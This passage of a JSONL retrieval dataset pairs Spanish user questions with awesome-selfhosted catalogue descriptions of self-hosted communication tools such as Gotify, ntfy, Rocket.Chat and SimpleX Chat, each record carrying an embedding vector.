-0.07956, 0.01775, 0.03257, -0.01901, 0.04497, 0.00114, -0.04748, -0.03898, -0.01853, 0.02831, -0.0207, -0.07481, -0.0642, 0.03454, -0.01836, 0.04251, 0.07149, -0.01406, -0.03642, 0.04819, 0.15212, 0.02835, -0.01185, 0.02755, 0.04371, 0.00071, -0.00438, 0.01407, 0.0242, 0.00598, 0.04245, -0.03376, -0.04632, 0.07303, 0.08372, -0.00026, -0.00356, 0.04563, 0.0269, 0.05531, 0.05112, -0.05268, 0.00567, 0.02954, -0.08508, 0.02774, 0.03344, 0.02198, -0.01543, -0.04754, -0.12716, -0.04003, 0.05557, -0.01979, -0.02502, 0.02342, -0.03643, -0.04961, 0.03505, 0.01514, -0.0104, -0.03742, 0.0358, 0.04439, -0.05654, 0.08053, -0.01546]} +{"tipo": "pregunta", "herramienta": "Communication - Custom Communication Systems", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Communication - Custom Communication Systems", "tema": "communication - custom communication systems", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Communication - Custom Communication Systems: Element β€” Fully-featured Matrix client for Web, iOS & Android [Apache-2.0, Nodejs]. GlobaLeaks β€” Whistleblowing software enabling anyone to easily set up and maintain a secure reporting platform [AGPL-3.0, Python/deb/Docker]. GNUnet β€” Software framework for decentralized, peer-to-peer networking [GPL-3.0, C]. Gotify β€” Notification server with Android and CLI clients (alternative to PushBullet) [MIT, Go/Docker]. Hyphanet β€” Anonymously share files, browse and publish _freesites_ (web sites accessible only through Hyphanet) and chat on forums [GPL-2.0, Java]. Jami β€” Universal communication platform which preserves the user's privacy and freedoms [GPL-3.0, C++]. Live Helper Chat β€” Live Support chat for your website [Apache-2.0, PHP]. Mumble β€” Low-latency, high quality voice/text chat software [BSD-3-Clause, C++/deb]. Notifo β€” Multichannel notification server with support for Email, Mobile Push, Web Push, SMS, messaging and a javascript plugin [MIT, C#].", "indexar": "cual es una alternativa libre a PushBullet para recibir notificaciones en tiempo real?", "v": [-0.13437, 0.16437, -0.15933, -0.02196, 0.01925, -0.01484, -0.07358, -0.09698, -0.0789, -0.14898, -0.07299, -0.16679, 0.06205, 0.11033, -0.01408, -0.02526, -0.05084, -0.0785, 0.04277, 0.03989, -0.00679, -0.04841, -0.16164, -0.00576, -0.05053, 0.05803, 0.0396, 0.12195, -0.06167, 0.08425, 0.09765, -0.05803, -0.01394, -0.00428, 0.04648, 0.08124, 0.09754, 0.08328, 0.03773, -0.11423, 0.11323, 0.04123, -0.05301, 0.10843, 0.04099, -0.09036, -0.04023, 0.03231, -0.00089, -0.0009, -0.07011, 0.03051, -0.1489, 0.07432, 0.01272, 0.01168, 0.22556, -0.10221, -0.01396, -0.02425, -0.08329, 0.00066, -0.0452, -0.01616, 0.06296, 0.04919, 0.0201, 0.02653, -0.07075, -0.0136, -0.03019, -0.13139, 0.0603, -0.01643, -0.0181, 0.10753, -0.10883, 0.05747, -0.0076, -0.00776, 0.04962, -0.09169, 0.03217, 0.09051, -0.06147, -0.004, 0.09036, -0.13489, -0.10524, 0.04967, 0.10088, 0.11181, 0.01995, 0.13625, 0.01595, -0.01625, -0.05041, -0.06915, -0.03337, 0.07825, 0.00107, -0.02494, -0.13161, -0.04494, 0.0181, -0.02307, -0.01992, -0.03947, 0.00329, -0.03977, -0.10405, -0.03953, -0.02811, 0.02857, 0.01741, 0.00153, -0.0184, -0.06431, 0.03576, 0.03516, -0.06358, 0.00584, -0.03949, -0.06327, 0.02986, -0.05426, -0.01719, -0.00282, 0.03521, 0.09206, 0.05975, 0.02301, -0.08363, -0.03226, -0.07766, -0.00653, 0.02428, 0.03184, 0.09464, -0.06628, 0.06082, 0.03352, 0.04894, -0.01067, 0.00439, 0.01284, -0.05752, -0.03081, -0.0081, 0.0191, -0.01156, -0.01656, 0.04524, 0.07735, 0.02032, -0.02352, -0.04495, -0.02996, -0.04941, 0.06523, -0.00674, 0.05224, -0.01926, -0.05276, -0.02118, -0.08513, 0.00922, 0.03069, 0.02517, 0.01339, 0.00863, 0.05373, 0.06899, -0.02531, -0.03929, -0.07715, -0.01802, -0.03761, 0.0461, -0.06792, 0.01968, 0.06322, -0.07443, -0.00548, -0.00093, -0.06966, -0.03451, 0.06386, 0.04942, 0.12184, -0.02934, 0.02109, 0.00951, -0.02503, -0.01339, -0.01711, 0.03269, -0.10501, -0.0256, -0.0305, -0.07794, -0.06964, -0.01398, -0.03884, -0.00862, 0.03142, -0.02765, 0.05255, -0.02835, 0.10143, 0.04397, 0.03612, 0.08399, 0.0369, -0.07712, -0.03175, 0.04993, -0.07405, -0.00142, 0.01153, 0.01398, 0.03474, 0.00713, 0.00395, -0.06889, -0.00299, 0.06413, 0.07779, 0.0156, 0.06505, -0.05553, 0.03736, 0.02217, 0.02684, 0.08739, -0.03697, 0.02836, -0.02042, -0.0175, -0.02793, 0.10053, 0.06138, 0.00766, 0.0538, -0.0394, -0.05038, -0.07946, 0.01518, -0.01169, -0.09171, 0.01384, 0.10381, 0.06343, -0.01575, 0.08535, -0.03064]} +{"tipo": "pregunta", "herramienta": "Communication - Custom Communication Systems", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Communication - Custom Communication Systems", "tema": "communication - custom communication systems", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Communication - Custom Communication Systems: Element β€” Fully-featured Matrix client for Web, iOS & Android [Apache-2.0, Nodejs]. GlobaLeaks β€” Whistleblowing software enabling anyone to easily set up and maintain a secure reporting platform [AGPL-3.0, Python/deb/Docker]. GNUnet β€” Software framework for decentralized, peer-to-peer networking [GPL-3.0, C]. Gotify β€” Notification server with Android and CLI clients (alternative to PushBullet) [MIT, Go/Docker]. Hyphanet β€” Anonymously share files, browse and publish _freesites_ (web sites accessible only through Hyphanet) and chat on forums [GPL-2.0, Java]. Jami β€” Universal communication platform which preserves the user's privacy and freedoms [GPL-3.0, C++]. Live Helper Chat β€” Live Support chat for your website [Apache-2.0, PHP]. Mumble β€” Low-latency, high quality voice/text chat software [BSD-3-Clause, C++/deb]. Notifo β€” Multichannel notification server with support for Email, Mobile Push, Web Push, SMS, messaging and a javascript plugin [MIT, C#].", "indexar": "quΓ© herramienta puedo usar para montar un sistema seguro donde las personas denuncien datos sin ser rastreadas?", "v": [0.03262, 0.05817, -0.15038, -0.11934, -0.0167, -0.06993, -0.10902, -0.08759, -0.1711, -0.03687, -0.18075, -0.12061, -0.02443, -0.11251, 0.06528, -0.00033, 0.03008, -0.01094, 0.03621, -0.05165, -0.03306, -0.17759, 0.01168, -0.06538, -0.17036, 0.05244, 0.07014, -0.12668, -0.18114, 0.09252, 0.04859, 0.05058, -0.01037, 0.012, -0.15859, -0.04373, -0.0473, 0.00224, 0.02981, -0.00272, 0.03803, -0.0558, -0.05574, 0.00035, 0.05512, 0.01738, -0.11451, -0.01247, -0.00348, 0.00311, -0.06501, -0.03254, -0.11927, -0.08898, 0.05452, -0.10174, 0.17987, -0.04369, 0.12669, -0.07106, -0.07728, 0.08413, 0.03176, 0.07033, 0.02225, -0.05246, 0.06599, -0.06143, -0.1203, 0.03119, 0.0382, -0.03097, 0.04144, 0.02527, 0.03386, -0.00796, 0.03996, 0.00645, 0.02043, 0.03742, -0.07135, 0.01123, -0.10363, 0.05943, -0.0789, -0.01435, 0.14757, -0.01676, -0.00143, -0.05065, 0.06341, 0.08432, 0.03017, -0.00731, 0.06086, 0.00343, 0.06323, 0.02178, -0.09605, -0.01687, 0.04516, -0.05852, -0.04158, 0.10066, 0.02908, -0.01721, 0.01973, -0.00177, -0.02912, -0.09263, -0.00269, 0.00059, -0.05351, -0.00986, -0.01422, -0.01799, -0.04389, -0.02778, 0.00526, -0.0178, 0.0392, 0.06402, 0.03272, -0.08269, 0.08503, -0.06318, -0.03498, 0.15054, -0.05507, -0.0128, 0.04362, -0.0311, -0.08053, -0.02864, 0.03864, -0.04685, -0.08962, -0.11006, 0.01732, -0.0183, 0.0409, 0.04144, -0.07228, -0.12948, -0.01797, 0.00718, 0.02545, -0.00236, -0.07534, -0.02682, 0.00316, 0.05883, 0.02599, 0.0021, -0.06276, 0.02284, 0.06893, -0.07807, -0.02409, 0.01995, 0.01679, -0.01003, 0.01801, 0.07355, 0.07317, -0.0531, 0.07927, -0.03416, 0.06092, 0.00881, 0.06034, 0.07795, 0.12035, -0.09443, 0.10699, -0.0691, -0.10897, -0.05723, -0.01664, -0.0641, -0.02795, 0.00638, -0.00264, -0.03421, -0.00916, -0.00674, 0.03052, -0.01968, -0.01568, 0.08409, 0.00646, 0.07452, 0.04756, -0.02533, -0.00697, -0.03958, -0.03397, -0.04638, 0.04924, -0.00109, -0.05019, 0.04312, -0.05003, -0.02085, 0.04898, 0.05659, -0.03297, -0.01825, 0.07647, 0.06236, 0.04147, -0.03775, 0.05282, -0.01901, -0.0452, 0.00104, 0.00232, 0.03077, -0.04173, -0.01734, 0.00933, 0.03385, 0.05084, 0.02409, -0.06239, 0.00599, 0.01002, 0.019, 0.00783, -0.00486, 6e-05, -0.03558, -0.02347, -0.04151, 0.02582, -0.038, 0.01764, -0.00805, -0.0555, -0.04316, 0.03529, 0.13162, -0.0213, -0.05264, -0.02901, -0.05964, -0.08281, 0.04205, -0.00167, -0.11783, -0.02556, 0.00213, 0.04987, -0.07422, -0.01685, -0.05089]} +{"tipo": "pregunta", "herramienta": "Communication - Custom Communication Systems", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Communication - Custom Communication Systems", "tema": "communication - custom communication systems", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Communication - Custom Communication Systems: Novu β€” Notification infrastructure for developers [MIT, Docker/Nodejs]. ntfy β€” Push notifications to phone or desktop using HTTP PUT/POST, with Android app, CLI and web app, similar to Pushover and Gotify [Apache-2.0/GPL-2.0, Go/Docker/K8S]. One Time Secret β€” Share sensitive information securely with self-destructing links that are only viewable once [MIT, Docker/Ruby/Nodejs]. OTS β€” One-Time-Secret sharing platform with a symmetric 256bit AES encryption in the browser [Apache-2.0, Go]. PushBits β€” Notification server for relaying push notifications via Matrix, similar to PushBullet and Gotify [ISC, Go]. RetroShare β€” Secured and decentralized communication system. Offers decentralized chat, forums, messaging, file transfer [GPL-2.0, C++]. Rocket.Chat β€” Communications platform that puts data protection first (alternative to Gitter.im and Slack) [MIT, Nodejs/Docker/K8S]. SAMA β€” Next-Gen self-hosted chat server and clients [GPL-3.0, Nodejs/Docker].", "indexar": "que herramienta sirve para enviar notificaciones push a mΓ³viles y escritorio desde la web?", "v": [0.09107, 0.14922, -0.19949, -0.21596, 0.07829, -0.12026, -0.15966, -0.08037, 0.02147, -0.10841, -0.07867, -0.09878, 0.10824, -0.05072, 0.01011, 0.01191, 0.10481, -0.08266, 0.01704, 0.07386, 0.01554, 0.06491, -0.07258, 0.00579, -0.12614, 0.07078, 0.03805, 0.00934, -0.17372, 0.05651, 0.03661, -0.04319, 0.06569, -0.02812, -0.0295, 0.04446, 0.00777, 0.04144, -0.08136, -0.00542, 0.03487, 0.0626, -0.11405, 0.01289, -0.02561, -0.07064, -0.01006, -0.00719, 0.03068, 0.07551, -0.04493, -0.12728, -0.15599, 0.03753, -0.07937, 0.02257, 0.2958, -0.13882, 0.07584, -0.07815, -0.0167, 0.05589, -0.06525, -0.01543, 0.00746, -0.03402, 0.03525, -0.02565, -0.10229, -0.02063, 0.00679, -0.01786, 0.10864, 0.02069, 0.0422, 0.0851, -0.14683, 0.07681, 0.04629, 0.02943, 0.05087, -0.032, -0.10555, -0.00839, -0.08991, -0.04996, 0.08537, -0.03004, -0.06346, -0.06016, 0.03756, 0.06197, -0.07879, 0.04454, 0.01942, -0.0454, -0.00864, -0.09245, 0.02491, -0.0028, 0.09972, -0.10657, -0.04723, 0.02033, -0.02111, 0.00524, -0.03522, -0.05167, 0.01804, -0.04565, -0.02417, -0.09247, -0.02174, 0.03255, -0.01008, 0.04023, 0.01857, -0.05909, 0.01703, -0.00799, -0.00537, 0.01594, -0.01564, -7e-05, -0.02326, -0.03595, -0.00726, 0.04644, 0.0349, 0.05462, 0.04894, -0.05885, -0.09186, 0.02495, -0.0175, 0.07181, -0.00304, -0.07072, 0.07809, -0.04613, 0.06612, 0.07888, -0.02814, -0.07361, 0.02899, 0.04925, 0.00039, -0.00349, -0.01202, 0.01495, 0.015, -0.06, 0.01301, -0.00337, -0.03235, -0.0225, -0.03507, -0.01872, -0.04324, 0.0601, -0.06918, 0.02101, 0.04507, 0.03048, -0.0329, -0.08008, -0.02273, 0.05034, 0.10381, 0.04862, -0.01045, -0.03198, 0.07912, -0.07015, -0.04681, -0.07925, -0.05271, 0.05324, 0.01867, -0.06691, -0.03683, 0.0519, -0.04354, -0.00695, 0.0018, -0.03503, -0.01904, -0.0352, 0.02602, 0.08697, -0.01856, 0.08863, 0.01432, -0.00975, 0.03352, -0.04578, -0.08246, -0.0674, 0.05894, -0.0315, -0.05634, -0.06447, -0.04093, -0.02719, 0.00284, 0.04774, -0.00254, 0.00901, -0.03388, 0.05609, 0.01257, -0.02312, 0.08066, 0.02321, -0.04259, -0.07243, 0.09616, -0.0263, -0.01593, 0.00069, 0.02114, -0.01483, 0.01397, -0.01704, -0.00851, 0.06271, 0.02157, -0.012, 0.03387, 0.00295, -0.01223, 0.01265, 0.02354, -0.01568, 0.0608, -0.01701, 0.06285, -0.04579, -0.10943, -0.02963, -0.02612, 0.03712, 0.03188, 0.02726, -0.05795, -0.0825, -0.06102, 0.01267, -0.00606, -0.0883, -0.00907, 0.04119, 0.07675, -0.03059, 0.0226, -0.03044]} +{"tipo": "pregunta", "herramienta": "Communication - Custom Communication Systems", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Communication - Custom Communication Systems", "tema": "communication - custom communication systems", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Communication - Custom Communication Systems: Novu β€” Notification infrastructure for developers [MIT, Docker/Nodejs]. ntfy β€” Push notifications to phone or desktop using HTTP PUT/POST, with Android app, CLI and web app, similar to Pushover and Gotify [Apache-2.0/GPL-2.0, Go/Docker/K8S]. One Time Secret β€” Share sensitive information securely with self-destructing links that are only viewable once [MIT, Docker/Ruby/Nodejs]. OTS β€” One-Time-Secret sharing platform with a symmetric 256bit AES encryption in the browser [Apache-2.0, Go]. PushBits β€” Notification server for relaying push notifications via Matrix, similar to PushBullet and Gotify [ISC, Go]. RetroShare β€” Secured and decentralized communication system. Offers decentralized chat, forums, messaging, file transfer [GPL-2.0, C++]. Rocket.Chat β€” Communications platform that puts data protection first (alternative to Gitter.im and Slack) [MIT, Nodejs/Docker/K8S]. SAMA β€” Next-Gen self-hosted chat server and clients [GPL-3.0, Nodejs/Docker].", "indexar": "con quΓ© puedo montar un sistema de mensajerΓ­a segura que funcione sin servidores centrales?", "v": [0.05444, 0.01364, -0.18399, -0.13245, -0.04892, -0.11668, -0.03754, -0.10167, -0.17193, -0.13184, -0.09682, 0.03039, 0.09367, -0.06662, 0.10795, 0.07071, 0.06803, -0.0405, 0.0365, 0.00595, 0.03448, -0.11617, 0.0195, -0.08991, -0.08308, 0.12301, 0.05218, -0.13552, -0.10844, 0.02689, 0.12757, -0.02043, 0.1931, -0.00832, 0.00811, -0.0032, -0.11216, 0.09862, 0.03594, 0.00846, 0.1112, 0.01665, -0.06275, -0.0042, 0.00244, -0.03632, 0.0882, -0.09578, 0.12307, -0.07343, -0.14766, -0.09769, -0.10715, -0.05106, -0.05929, -0.03252, 0.07713, 0.05174, 0.10237, -0.04057, -0.0891, 0.14029, 0.04011, -0.01355, 0.07563, -0.02426, 0.00303, -0.10552, -0.12183, -0.01266, -0.01078, -0.03675, -0.02768, 0.03979, -0.00919, 0.08028, -0.10134, 0.03928, 0.00696, 0.14968, 0.01656, 0.02358, 0.00044, 0.03934, -0.03951, -0.05697, -0.01215, -0.0555, -0.05755, -0.02785, 0.06318, 0.00466, 0.02362, 0.12827, 0.06968, -0.05389, -0.00677, -0.0648, -0.02252, 0.00294, 0.06128, -0.01361, -0.00237, 0.11399, -0.01166, -0.04765, 0.10409, -0.06273, 0.14222, -0.08702, -0.00845, -0.01323, -0.00616, -0.01245, -0.08347, -0.03587, -0.05334, 0.05652, -0.00722, -0.00685, -0.08638, 0.07859, 0.12329, -0.02185, 0.10047, 0.01107, 0.05903, 0.06518, 0.00949, 0.00059, 0.00918, -0.05578, -0.07757, -0.01768, -0.01289, 0.00221, -0.01255, 0.02907, -0.0154, 0.02668, -0.02912, 0.08041, -0.01744, -0.0461, 0.0549, 0.06471, 0.14408, -0.09604, -0.02583, -0.0066, 0.02228, 0.01713, -0.02731, -0.04143, -0.04355, -0.03303, 0.06021, -0.07935, -0.02353, 0.08527, 0.06159, 0.03621, -0.0184, 0.10102, -0.01428, 0.00696, -0.02517, 0.03781, 0.04481, 0.04469, -0.03045, -0.00403, 0.09446, -0.06085, 0.04417, 0.02184, -0.08394, -0.01327, 0.06379, -0.02282, -0.04756, 0.06293, 0.02319, 0.01165, -0.00452, 0.04039, -0.06705, -0.00395, 0.02654, 0.0705, 0.05093, 0.00571, -0.05769, 0.04266, 0.01784, -0.07456, -0.05989, -0.0436, -0.02736, 0.01751, -0.02091, -0.02105, 0.0193, -0.02703, 0.00107, 0.01448, -0.05047, 0.07957, 0.0312, 0.06643, 0.0403, 0.00756, 0.10579, -0.07536, -0.02224, 0.00933, 0.03233, -0.00685, -0.03251, 0.01398, 0.01301, 0.00257, 0.02096, 0.00704, -0.01404, 0.03701, 0.00786, 0.06024, 0.06012, 0.02214, -0.0243, 0.01562, -0.01637, 0.01747, 0.01364, -0.04508, 0.00056, -0.02087, -0.02679, -0.08937, 0.02368, 0.08862, 0.02106, -0.00414, -0.01076, -0.06526, -0.05737, -0.00257, -0.03924, -0.05378, -0.03043, 0.01031, -0.01542, -0.01556, -0.00609, -0.07984]} +{"tipo": "pregunta", "herramienta": "Communication - Custom Communication Systems", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Communication - Custom Communication Systems", "tema": "communication - custom communication systems", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Communication - Custom Communication Systems: Novu β€” Notification infrastructure for developers [MIT, Docker/Nodejs]. ntfy β€” Push notifications to phone or desktop using HTTP PUT/POST, with Android app, CLI and web app, similar to Pushover and Gotify [Apache-2.0/GPL-2.0, Go/Docker/K8S]. One Time Secret β€” Share sensitive information securely with self-destructing links that are only viewable once [MIT, Docker/Ruby/Nodejs]. OTS β€” One-Time-Secret sharing platform with a symmetric 256bit AES encryption in the browser [Apache-2.0, Go]. PushBits β€” Notification server for relaying push notifications via Matrix, similar to PushBullet and Gotify [ISC, Go]. RetroShare β€” Secured and decentralized communication system. Offers decentralized chat, forums, messaging, file transfer [GPL-2.0, C++]. Rocket.Chat β€” Communications platform that puts data protection first (alternative to Gitter.im and Slack) [MIT, Nodejs/Docker/K8S]. SAMA β€” Next-Gen self-hosted chat server and clients [GPL-3.0, Nodejs/Docker].", "indexar": "cual es una alternativa libre a Slack o Gitter para crear mi propio chat privado?", "v": [-0.22116, 0.04362, -0.05996, 0.05232, -0.01608, -0.2115, -0.06596, -0.04414, -0.10163, 0.00451, -0.02869, -0.14755, -0.00243, -0.03449, 0.04842, -0.00038, 0.0254, -0.15571, 0.08502, 0.03289, -0.07979, 0.11937, 0.05344, -0.18999, -0.08257, -0.0888, 0.19713, -0.01098, -0.03541, 0.17337, -0.00557, 0.09083, -0.0209, -0.0429, 0.01963, -0.05612, 0.20584, -0.04068, 0.06012, 0.04688, 0.10352, -0.1007, -0.007, 0.14898, 0.05113, -0.04197, 0.02599, 0.02359, -0.06266, 0.12475, -0.05956, -0.0363, -0.04149, 0.08693, 0.05239, -0.02013, 0.09597, -0.13228, 0.00201, -0.00753, -0.13387, 0.03738, 0.11245, 0.02732, 0.07733, -0.09388, -0.06593, 0.0193, -0.0789, 0.09468, 0.02764, -0.06344, 0.0059, 0.00034, -0.06393, 0.07828, -0.07598, 0.02227, -0.01526, -0.00398, -0.01097, -0.07866, 0.02527, 0.07073, -0.02157, 0.00161, 0.02801, -0.01601, 0.0473, 0.03858, 0.00596, 0.03857, 0.00816, 0.10389, -0.0921, -0.09147, 0.05682, 0.03177, -0.01177, 0.02022, 0.04479, -0.04156, -0.16614, -0.00569, 0.03648, -0.02152, 0.05377, -0.01337, -0.04298, 0.01968, 0.05003, 0.07482, 0.08215, 0.00952, 0.07165, -0.08805, -0.02971, -0.00171, -0.00656, 0.05475, 0.00345, -0.01248, -0.11373, -0.07634, -0.03876, 0.03355, -0.00281, -0.00895, -0.07976, 0.11997, 0.01352, -0.00237, -0.05641, -0.12361, -0.034, 0.09738, 0.0091, -0.03591, 0.06567, -0.07643, -0.01726, 0.01614, -0.03573, -0.05887, 0.07843, 0.04868, -0.04112, -0.13193, 0.02345, 0.01661, -0.03871, 0.05781, 0.03835, 0.08967, -0.05201, 0.05547, -0.05851, -0.03811, 0.0171, 0.12061, -0.0036, 0.00835, 0.00773, 0.00507, 0.01289, 0.01092, 0.00147, -0.03464, -0.05443, 0.02815, -0.02114, 0.00479, 0.04769, -0.08412, 0.07461, -0.04775, -0.01357, -0.05757, -0.01147, -0.07442, 0.05975, 0.00111, -0.05772, -0.04145, -0.023, -0.07642, 0.02615, 0.02716, 0.02769, 0.02918, -0.09125, 0.02963, 0.01637, -0.04174, -0.02132, -0.00511, 0.00622, -0.10366, -0.00753, -0.00331, -0.00581, -0.0164, -0.0211, 0.01328, -0.01835, -0.02532, -0.0376, 0.00385, 0.02351, 0.02214, 0.06458, 0.0067, 0.08561, -0.00475, 0.03385, 0.05043, 0.0286, -0.05368, 0.04484, -0.04272, 0.02853, 0.02772, 0.02597, -0.0277, 0.03174, 0.04617, -0.02201, 0.05058, -0.01017, 0.04352, 0.01655, -0.01904, 0.01224, -0.0171, 0.03442, -0.00668, 0.05205, 0.02986, 0.00119, 0.02826, 0.02251, 0.02639, -0.02428, 0.00151, -0.01159, 0.01518, -0.06602, 0.02625, -0.07209, -0.01409, 0.02612, 0.03016, 0.02013, -0.0266, 0.02012, 0.01772]} +{"tipo": "pregunta", "herramienta": "Communication - Custom Communication Systems", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Communication - Custom Communication Systems", "tema": "communication - custom communication systems", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Communication - Custom Communication Systems: Screego β€” Screego is a simple tool to quickly share your screen to one or multiple people via web browser [GPL-3.0, Docker/Go]. Shhh β€” Keep secrets out of emails or chat logs, share them using secure links with passphrase and expiration dates [MIT, Python]. SimpleX Chat β€” The most private and secure chat and applications platform - now with double ratchet E2E encryption [AGPL-3.0, Haskell]. Spectrum 2 β€” Spectrum 2 is an open source instant messaging transport. It allows users to chat together even when they are using different IM networks [GPL-3.0, C++]. Stoat β€” Stoat is a user-first chat platform built with modern web technologies [AGPL-3.0/MIT, Rust]. Synapse β€” Server for [Matrix](https://matrix.org/), an open standard for decentralized persistent communication [Apache-2.0, Python/deb].", "indexar": "que herramienta sirve para compartir pantalla por web de forma sencilla?", "v": [0.01673, 0.08897, -0.22947, -0.25248, -0.04175, -0.21172, -0.11665, -0.09852, 0.08483, -0.08504, -0.03415, -0.04975, 0.00837, -0.11903, 0.04527, 0.0287, 0.09773, -0.15079, 0.02123, -0.04516, -0.02439, 0.04616, -0.16264, -0.0744, -0.10687, -0.02835, 0.04765, 0.01225, -0.1542, 0.0439, 0.00315, -0.01671, 0.01737, -0.0164, -0.10571, -0.04516, 0.02829, 0.05534, -0.00561, 0.02394, -0.05177, 0.07974, -0.01008, 0.07035, -0.02132, 0.07281, 0.01709, 0.0012, 0.00408, 0.11393, -0.0522, -0.10208, -0.11021, 0.04559, -0.06257, -0.10787, 0.22036, -0.19996, 0.03924, -0.08603, -0.07375, -0.0074, -0.10078, -0.06142, -0.04581, -0.02628, -0.01158, 0.03987, -0.08949, 0.0709, 0.00626, 0.00591, 0.07844, -0.03963, -0.00323, -0.00037, -0.06957, -0.01107, 0.03346, -0.01807, 0.09362, -0.01695, -0.06371, -0.03324, -0.05091, -0.06603, 0.0255, -0.03071, -0.0016, -0.08003, -0.01093, 0.07753, 0.00404, -0.04112, -0.01849, -0.05143, 0.03276, 0.00264, -0.01535, -0.05446, 0.12469, -0.08259, -0.06272, -0.01807, -0.04578, 0.04153, -0.04425, -0.03985, -0.11451, -0.03555, 0.12015, 0.02708, -0.03537, 0.03044, -0.02877, 0.0932, -0.0089, 0.00291, -0.05617, -0.03191, 0.04071, 0.03782, -0.08709, -0.03384, 0.03347, 0.04895, -0.02, 0.07705, -0.06874, -0.05675, 0.00321, -0.08689, -0.05024, 0.06638, -0.01314, -0.05684, 0.0579, -0.07965, 0.00736, -0.10712, 0.0365, 0.04721, -0.09773, -0.14348, 0.00804, -0.01609, 0.09475, -0.01544, -0.06306, 0.03329, -0.00568, -0.05842, -0.01861, -0.0074, -0.03994, -0.01765, -0.04432, 0.05186, -0.09897, 0.00452, -0.05215, -0.05685, 0.02444, 0.02399, 0.00899, -0.03965, -0.04742, 0.02482, 0.07987, 0.02154, 0.04458, 0.06296, 0.06335, -0.06663, -0.03388, -0.02772, -0.09336, 0.01532, -0.04448, -0.056, -0.00987, 0.00946, -0.03543, 0.05917, 0.00237, -0.03624, 0.00164, 0.00048, -0.04993, 0.00762, 0.01984, 0.03634, -0.01741, -0.02683, 0.06274, 0.01394, -0.04739, -0.04544, 0.0681, 0.00157, -0.03785, -0.07837, 0.04264, 0.0048, -0.00511, 0.05889, -0.00942, -0.00907, 0.02236, 0.04764, -0.00369, 0.01962, 0.03192, -0.04345, 0.00315, -0.02464, 0.06159, 0.01818, -0.02404, 0.01783, 0.03, -0.03968, -0.01614, -0.02111, 0.031, 0.06093, 0.00058, 0.01808, -0.04417, -0.0699, 0.02405, -0.04147, 0.05207, 0.01034, -0.00538, -0.06912, -0.0098, -0.01694, -0.05273, 0.02113, -0.05763, -0.01286, 0.03113, 0.01357, -0.04126, -0.0461, -0.02206, -0.03011, -0.02735, -0.08864, -0.0483, -0.05233, 0.03973, 0.02706, -0.05308, 0.02584]} +{"tipo": "pregunta", "herramienta": "Communication - Custom Communication Systems", "perfil": "AUTOHOSPEDADO", "fichero": "awesome: awesome-selfhosted / Communication - Custom Communication Systems", "tema": "communication - custom communication systems", "fuente": "awesome-selfhosted", "licencia": "CC-BY-SA-3.0", "texto": "Catalogo awesome-selfhosted / Communication - Custom Communication Systems: Screego β€” Screego is a simple tool to quickly share your screen to one or multiple people via web browser [GPL-3.0, Docker/Go]. Shhh β€” Keep secrets out of emails or chat logs, share them using secure links with passphrase and expiration dates [MIT, Python]. SimpleX Chat β€” The most private and secure chat and applications platform - now with double ratchet E2E encryption [AGPL-3.0, Haskell]. Spectrum 2 β€” Spectrum 2 is an open source instant messaging transport. It allows users to chat together even when they are using different IM networks [GPL-3.0, C++]. Stoat β€” Stoat is a user-first chat platform built with modern web technologies [AGPL-3.0/MIT, Rust]. Synapse β€” Server for [Matrix](https://matrix.org/), an open standard for decentralized persistent communication [Apache-2.0, Python/deb].", "indexar": "con que puedo crear un chat privado con encriptaciΓ³n de extremo a extremo?", "v": [-0.12411, 0.06115, -0.04448, -0.01515, -0.0029, -0.16627, -0.04028, 0.14625, -0.03338, -0.10735, 0.02639, -0.07035, -0.02337, -0.04568, 0.0607, -0.06751, -0.02517, -0.0501, 0.0885, -0.00628, 0.04038, -0.13253, 0.07663, -0.09974, -0.07911, -0.07301, -0.02334, 0.1755, -0.04635, 0.14464, -0.00155, 0.16796, 0.07259, 0.02975, 0.08453, -0.04217, 0.09438, 0.01351, -0.06533, 0.19628, 0.09073, -0.04672, 0.01367, 0.13297, 0.04409, 0.03047, -0.06852, 0.05275, 0.02795, 0.02521, -0.05667, -0.15714, -0.1923, -0.00808, -0.02281, 0.02789, 0.04108, -0.1615, 0.03435, -0.07967, -0.06619, 0.08698, 0.01429, 0.0302, 0.06251, -0.04029, -0.16002, 0.05144, -0.1452, 0.04758, 0.02001, -0.04714, -0.08291, 0.08107, 0.10546, 0.04649, -0.11541, 0.02098, -0.05328, 0.05197, -0.08177, 0.00418, 0.00502, -0.00716, -0.14747, -0.01768, -0.00679, 0.0596, 0.03403, -0.00181, 0.07534, 0.03353, -0.00753, -0.05738, -0.0163, -0.01947, -0.00663, -0.04522, -0.05976, -0.00982, 0.06184, 0.06235, -0.10399, 0.07951, -0.0216, -0.00576, 0.00448, -0.02782, 0.05351, -0.04054, 0.03576, 0.09498, -0.00529, -0.0426, -0.01173, -0.0946, -0.05885, -0.01583, 0.06936, -0.06074, -0.04325, -0.02396, -0.05317, -0.00144, -0.06647, -0.00375, -0.12353, 0.03207, -0.01864, 0.04558, -0.09037, -0.03736, -0.04599, -0.0118, 0.00091, 0.12446, 0.00679, 0.01855, 0.00752, -0.00982, -0.00739, 0.06467, -0.07491, -0.06843, 0.03746, -0.02231, -0.0818, -0.08253, -0.00857, 0.04845, -0.02361, 0.0966, 0.02508, 0.0585, -0.15257, 0.01844, -0.00974, -0.09177, 0.04808, 0.0973, -0.00224, 0.05999, -0.05177, -0.01032, -0.04289, 0.0007, 0.00137, 0.00149, -0.03082, -0.06335, -0.06183, -0.03207, 0.04374, -0.0757, 0.07986, -0.02169, 0.01008, -0.0812, -0.03523, -0.06039, 0.0315, -0.04851, -0.04747, -0.05975, 0.02741, -0.00172, 